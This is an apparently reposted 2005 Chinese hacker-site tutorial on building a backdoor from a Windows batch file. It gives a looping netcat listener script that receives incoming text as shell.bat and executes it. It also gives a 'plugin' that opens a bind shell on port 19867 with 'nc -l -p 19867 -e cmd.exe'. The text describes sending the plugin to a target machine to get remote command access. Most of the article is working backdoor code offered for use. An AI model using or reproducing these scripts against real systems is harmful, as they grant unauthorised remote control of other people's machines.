| 关于构建Bat door 的一些思路和方法 |
| 责任编辑:admin 更新日期:2005-7-6 |
|
|
来源:http://www.163ol.cn/angel/default.asp
先简单介绍一下批处理文件编写
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。
我主要介绍一下批处理来实现简单的后门功能,
以下是一个简单的例子
@echo off
:start
nc -vv -l -p 19818 >>shell.bat
call shell.bat
If Exist shell.bat (del shell.bat) ELSE echo shell.bat missing
goto start
这样就是一个微型的Server端了,关键就在于插件的写法了,我简单的给大家些个正向连接cmdshell的插件做示范吧
@echo off
nc -l -p 19867 -e cmd.exe
这个很简陋,只要用nc 把这个提交到目标机的19818端口就可以得到一个正向连接的shell了,用nc连接19867端口看看。至于反弹shell怎么实现,我相信不用写了吧,其实bat的功能还很强大,就看你怎么去写了。上面用判断文件存在的方法其实很笨,一时想不起来命令了,所以用了点笨办法不好意思啦
有不明白的地方或则要指教的地方请看留言,申明一点,本人不是所谓的高手,写这些纯属于个人爱好.
 |
|
| 上一篇文章: 知马识马不养马 |
| 下一篇文章: 菜鸟手动脱壳全过程,超详细 |
|
|
|
|
